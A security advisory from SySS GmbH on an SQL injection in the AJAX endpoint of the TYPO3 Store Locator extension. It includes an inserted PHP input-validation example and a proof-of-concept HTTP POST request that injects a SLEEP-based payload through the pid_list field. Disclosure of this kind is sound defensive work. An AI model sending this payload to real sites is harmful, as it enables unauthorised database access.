Advisory ID: SYSS-2015-011
Product: TYPO3 Extension Store Locator (locator)
Vendor: TYPO3 Association
Affected Version(s): 3.3.0 and below
Tested Version(s): 3.3.0
Vulnerability Type: SQL Injection (CWE-89)
Risk Level: High
Solution Status: Open
Vendor Notification: 2015-02-27
Solution Date: 2015-04-27
Public Disclosure: 2015-06-22
CVE Reference: Not assigned
Author of Advisory: Franz G. Jahn, SySS GmbH, https://www.syss.de/advisories/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

An SQL injection vulnerability could be identified in the TYPO3 extension Store Locator (locator).

Store Locator (locator) is a TYPO3 extension which integrates Google Maps into TYPO3. The extension is described as follows (see [1]):

"Manage store locations, search by distance and show Google maps and route maps, stores can be tt_address, fe users and tt_news records too. Traffic-, bicycling- and weather-layer enabled in api v3."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The SySS GmbH found an SQL injection vulnerability in the AJAX component of the TYPO3 extension locator.

The attribute pid_list of the JSON-encoded parameter data is not validated server-side and can therefore be abused to inject arbitrary SQL statements.

This SQL injection vulnerability can be exploited by an unauthenticated attacker by sending a specially crafted HTTP POST request (see PoC section).
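A defensive counterpart to the flaw described above, added here as an example and not taken from the extension's code: the pid_list attribute of the JSON-encoded data parameter is accepted only as a comma-separated list of unsigned integers before it reaches the query, so a payload like the one in the PoC section is rejected instead of concatenated. The function names are assumptions.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern (sketched, not the extension's code): the request value is
// concatenated into the query unchanged, e.g.
//   $where = 'pid IN (' . $data['pid_list'] . ')';
// Anything the client puts into pid_list becomes part of the SQL statement.

/**
 * Decode the "data" POST parameter and return pid_list as a list of
 * non-negative integers. Any other shape raises an exception.
 * TYPO3 core offers GeneralUtility::intExplode() for the same purpose.
 */
function parsePidList(string $jsonData): array
{
    $data = json_decode($jsonData, true);
    if (!is_array($data) || !array_key_exists('pid_list', $data)) {
        throw new InvalidArgumentException('data.pid_list missing');
    }
    $raw = $data['pid_list'];
    // Allow-list: digits separated by single commas, nothing else ("1,5,42").
    if (!is_string($raw) || !preg_match('/^\d+(,\d+)*$/', $raw)) {
        throw new InvalidArgumentException('pid_list must be a comma-separated list of integers');
    }
    return array_map('intval', explode(',', $raw));
}

/**
 * Build the page-id restriction. Because every element is a validated
 * integer, joining them into the IN() list cannot alter the query structure.
 */
function pidWhereClause(array $pids): string
{
    return 'pid IN (' . implode(',', $pids) . ')';
}

// Constructed sample inputs: a legitimate request body and the advisory's
// PoC value as it arrives after form-urlencoded decoding.
$requests = [
    '{"pid_list":"1,5,42","radiusPresets":"20","resultLimit":"300"}',
    '{"pid_list":"1 AND SLEEP(5)","radiusPresets":"20","resultLimit":"300"}',
];
foreach ($requests as $json) {
    try {
        echo pidWhereClause(parsePidList($json)), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

The first input yields `pid IN (1,5,42)`; the second is rejected before any SQL is built, which is the server-side validation the advisory notes was missing.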
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following request can be used to delay the server response by five seconds:

POST /index.php?eID=tx_locator_eID HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

ref=Tuebingen%3ADE%3A20%3A&data={"pid_list":"1+AND+SLEEP(5)","radiusPresets":"20","resultLimit":"300"}&tx_locator_pi1%5Baction%5D=getMarkers&tx_locator_pi1%5Bsearch%5D=Tuebingen%3ADE%3A23000%3A&tx_locator_pi1%5Bpw%5D=0

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update the extension to the latest version.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-02-23: Vulnerability discovered
2015-02-27: Vulnerability reported to vendor
2015-04-27: Vendor releases fix for the described security vulnerabilities
2015-06-15: Release of the TYPO3 Security Bulletin TYPO3-EXT-SA-2015-09 [2]
2015-06-22: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] TYPO3, Extension Store Locator (locator)
    http://typo3.org/extensions/repository/view/locator
[2] TYPO3, TYPO3-EXT-SA-2015-09: SQL Injection vulnerability in extension Store Locator (locator)
    http://typo3.org/teams/security/security-bulletins/typo3-extensions/typo3-ext-sa-2015-014/
[3] SySS Security Advisory SYSS-2015-011
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-011.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Franz G. Jahn of the SySS GmbH.
E-Mail: franz.jahn@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Franz_Jahn.asc
Key ID: 0xD06A14DE
Key Fingerprint: 2D26 E435 DF7F 572D A0C9 1DE8 D5A6 1496 D06A 14DE

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en